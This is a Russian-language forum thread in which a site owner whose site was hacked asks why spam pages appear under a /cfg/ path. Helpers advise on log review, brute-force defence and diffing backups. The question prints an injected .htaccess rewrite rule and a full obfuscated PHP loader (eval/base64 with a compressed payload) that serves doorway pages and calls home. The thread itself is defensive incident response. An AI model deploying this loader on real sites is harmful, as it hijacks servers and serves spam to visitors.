Как найти на сайте директорию, которая существует, но ее не видно?

Question

[keslo]

Добрый день, господа!
Вопрос в заголовке получился довольно сумбурный. Но... crlz по-всему был какой-то взлом...

Есть сайт - www.macmachine.ru/ Там все работает и открывается. Порядка 20-30 страниц.
Сегодня я заметил, что страниц в индексе Яндекса стало 5000+ О_о
Начал смотреть.
Все новые страницы идут из такой директории www.macmachine.ru/cfg/. Но директории /cfg/ у меня нет на хостинге... да и не должно быть. По всем ссылкам открывается какой-то шлак с рекламой.
Что делать?

ПОСЛЕДНИЕ НОВОСТИ

1. Нашел с htaccess такие строки:

Options +FollowSymlinks
RewriteEngine   on
RewriteRule ^cfg/(.*)$ /manager/includes/config.php/$1 [L] 
RewriteBase /

2. config.php представляет из себя такое:

<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=ce1340daf66134d8ea13d1c9d6828eabd889094arVf/b9pGFP+ZSv0fXi0kmwkMZOrWEmVtRJwmUxIyIJWmNEKuOYM32+fZ54aopX/73rvzV6BkiYYAc3fv87l37+vRjGyxnPITHsMRaF3HXWiH8PJFM3g444mguQPz3k3wox3iNEmPwstiUQkLFkS+LRjO6O6SpwnTSdjhYcgckusdQrcLRh864NyML9rQw18T7vzNRCtjRakk/ZyI2GjOJtb4ozW+1cfWHzfWZDq7GZ/rd23ARZ+FRrNQudWibZYi8BG9YGLIQ8FCYWTat6GmrylHOJmr264wIZHngoFbSBWUpGY6SaK1WrBk9pzFhp5t0Jk+RGwAgq1EFyUOwVnaccLEUSrczhudyJifMNjFGIWLHzN6gb1gXRTZz/FXhBzw7RtsL7BH2UlmP/3Ccx8jQZH9HJ7DKxxaziEqHKsOCoXaXppV4Jc0UOoiSgegyJMcIFbiEZdicHjhUzjjapQ8Xcs9qlBs78Ih0llyQ8a+Grtp6AiPh7U8WJZZUI17qAQ+fCV0Y+Hzz7YPec5upA7u0KBz58sS1cB3o6mUTzAB7Ti2HwyabGhj5rKYxQNYChENul3NLLP6bDq9np2NJlP9ztRoJdfLLNWihbaiOnYcFomOb4eLFMNmACzMl24SFneOF3jUAUwsfjIad4a+h0Mwqtp3amdpaQQmozXUCRyqPU4a+zMv9IShVuQYbc4jNKOD1hti3RpdUy3C8qVnx9JNaWKl+CNAOvaZdXxijdG4udUewYyt6c34ajo+vpqcEq7/GGA4urqyhtPp+aU1upki4PVjiG3RmIk0DqEZsyT1RW6bmM29eMZWzDGATFahdXyeMGKVc2uQQf1V2vZz6rrUFXQp3UxkyceJ9y795BGVcxWkb3poFhbHIVdPzC+1hYw7BcyDtdF470apSPJ5TMEP1hS+SjesgSzd7Zu9T/EnVV52ASgUBgih3dd7JZ8XZXsp/4f02Ms/VGmK5WAA0jskXSAk5n7p+QyMV+9dxt3CwCqxG7nnTPIUFpQKd//gTbbrWn5nCmQxkNEogTKC2Cry+ZwZWqEHOpl2aMNBJpwxkbejmC1mgS2cpaF9v+COrQ5imD+1vhNQ0d728ErQDEqV815jrSIPRQZwyUPk/wV+T33ov337K/ReD3o9fMOHyylaAuq4oe0sWYdqZ8z9AYS849BMG4IUvRuzL7bvzdEPhMTbTBZl/Q2W69heBHYJ3y99YSP1JZ97rsfmA+q9AW1haCdtmMMl/AlnA2+A3cXUlM51eMH6c6+Px/3C5nDN4sAOMTr9hy3x0paaifmFOY2B5TCjFrlY3XQy7G3/Du9XbOWJLXfXKwQKSoks8bNFTZPF4OWLda07bdYSqhrSgXkD2mg7gK9EoNYOVh3C+pxHibpSwo7lwF4VIgeljGpeJR7gt6NNBOoBoDrC7o3olZ3u9PhiYhULa/X4cenPyr6IU9YqUP+56tdhTQwQO6/KhQ2LZd9LqPFLj7eVcOtHGUiLMgMLbqpHMwcF8w0w+b3Q5aWC51enI9nLsNecWK26hSvwIxmTeEfdnDzIErYpM5yVNwfF1WhU079bhCxm/7vWp7CrFd2TglRR5MgmakzNJaLr0gwHhoi9wJD0s4hHRgGQ/xxyn5Lqrwibl5Ju1+GpPw91AVHMHZYkIJYMiF1wkNFL/2vwt0rnXQFTSRMycy2I1pm6Pmb/TOlcqrzH7NbpKTb3848W3UJa+akL9W/1BA8XMP2uBfUxblBsVs5u46kZlmg1qmPV3DaS0rZEqlEdqeYyJH263WbI7rPzb+hrgk7XK3zWVDHr/CaGnBz/k7L4Qb97p7/DG1l1ZqDrqghubfV0Cvo8r8c8o8NUYTtaSnX5WT3kSR3kOf0js3fZQlTgq7vhVp09ypNmK2caMlnW/wI=

Answer 1

[Алексей Захаров]

а вы уверены, что эта папка на ВАШЕМ сервере?
как я понял, доступ к сайту у вас есть, и сайт относительно работает(если все страницы сайта вдруг изменились, то смотрите на параметры домена, может это его угнали).
ну а раз доступ есть, то проблема в скриптах скорее всего.
физически, этой папки может и не быть.

Comments

[keslo]

Видимо страницы на другом хосте, а работает вредоносное ПО через редирект.

[Алексей Захаров]

Я с телефона сейчас, изучить выложенный файл не могу, но скорее всего именно так и есть.

Answer 2

[nokla]

Disallow: /cfg/

Comments

[keslo]

Именно этим и занимаюсь сейчас. Но в чем может быть проблема?

[nokla]

Вы наверно шаблон бесплатный скачали, а он ломаный.

[keslo]

@nokla Не, шаблон самоделаный )

Answer 3

[Push Pull]

а что насчет редиректов?
если физически, директории нету, поиск по файлам - "cfg", grep'ом умеете пользоваться?
что-то да гдето заражено, php или htaccess или js скрипты, надо искать. правда еще можно поискать по
"Y2Zn" - это base64 закодированная строка "cfg"

Answer 4

[Maksim Zverev]

То, как вас взломали зхависит от множества факторов.
1. Банальный брутфорс, как админки, так и ftp/sftp
Если у вас есть sftp посмотрите командой last, если ftp, смотрите логи. Если у вас хостинг, запросите хостинг компанию дать вам логи фтп.
2. Использовали сторонний php компонент не разобравшись в нем.
3. Что то делал фрилансер, доступы утекли через него / с помощью него.

UPD: Прикольное название у этой штуки, она себе домой стучится под юзер агентом: SEoDOR-Client

Comments

[Maksim Zverev]

@keslo вот ссылка на декодированный исходник pastebin.com/nfibnieK

[keslo]

А если я буду знать IP, с которого взломали FTP, то что можно с этими данными сделать?

[Maksim Zverev]

@keslo
Ничего, реалии таковы, что полиция не возмется, получите отфутболивание.
Вы можете написать хостеру, что с такого то IP происходила атака. Просьба забанить.
Ничего не хочу сказать про вашу компанию, не работал свами, но по моему опыту сео компании весьма легкомысленно обращаются с безопасностью :/
Из советов, что могу дать, все достаточно банальны, а именно:
1. Сложные к брутфорсу пароли.
2. 1 человек = 1 учетная запись и пароль. Никто не должен знать пароль не от своей учетной записи, ну кроме админа, который раздает доступы.
3. Если есть фрилансеры, закончили работу с ними, отключили все доступы.

[Maksim Zverev]

@keslo Если есть грамотный php шник, можете модифицировать скрипт, что я скинул по ссылке, что бы посмотреть, можно ли с него дернуть что то с того сервера.

[keslo]

@m1skam Я над сайтами один работаю. Так что если лопухнулся, то сам. Пароль видимо простой был, хотя хз сколько времени пытались его подобрать.

Изменил в настройках FTP, что доступ к FTP возможен только с моего IP. Данная мера поможет с такого рода взломами?

[keslo]

@m1skam "SEoDOR-Client" действительно здорово :-)

[Maksim Zverev]

@keslo Да, доступ только с вашего IP поможет со взломом.
Но остается еще куча вариантов :)

[keslo]

@m1skam и как же быть? Есть подобный чек-лист по данному вопросу?

[Maksim Zverev]

@keslo поймите векторов атаки множество.
Это может быть ваш компьютер, да да сюрприз, но антивирусы не дают 100% защиты.
Это может быть уязвимость в самом сайте.
Это может быть уязвимость в хостере.

Для того. Для начала надо 100% убедиться, что эта атака, которая имело место быть, была сделана именно через FTP брутфорсом. Для этого надо смотреть логи и сравнивать с своими входами. Если окажется, что это фтп, то тут да, проще, тупо брутфорс. А если нет? Надо копать дальше, проверять сайт на наличие шелов, самое лучшее взять бекап сайта, где нет этой штуки и сравнить с текущим состоянием сата на предмет разницы в файлах, бд в расчет не берем.

[keslo]

@m1skam А есть такая прога, которая может найти различия в двух вариантах бэкапа?

[Maksim Zverev]

Если не ошибаюсь TotalCommander умел сравнивать.

[keslo]

@m1skam Да, он может. Но отдельно по файлу. А так, чтобы пачкой?

[Maksim Zverev]

ну или пошлый вариант, распаковываем один вариант :) старый, создаем git репозиторий в папке, коммитим все файлы, накатываем свежий бекап уже с дыркой, и далее diff файлов которые подсветились

Answer 5

[keslo]

Ваше экспертное мнение: каким образом подобный код мог попасть на сайт? И какие меры принять, чтобы это снизить к минимуму?

Comments

[Алексей Захаров]

Мало данных, чтоб рецепт сказать,
Но начать можно с даты изменения файла и изучения логов в это время.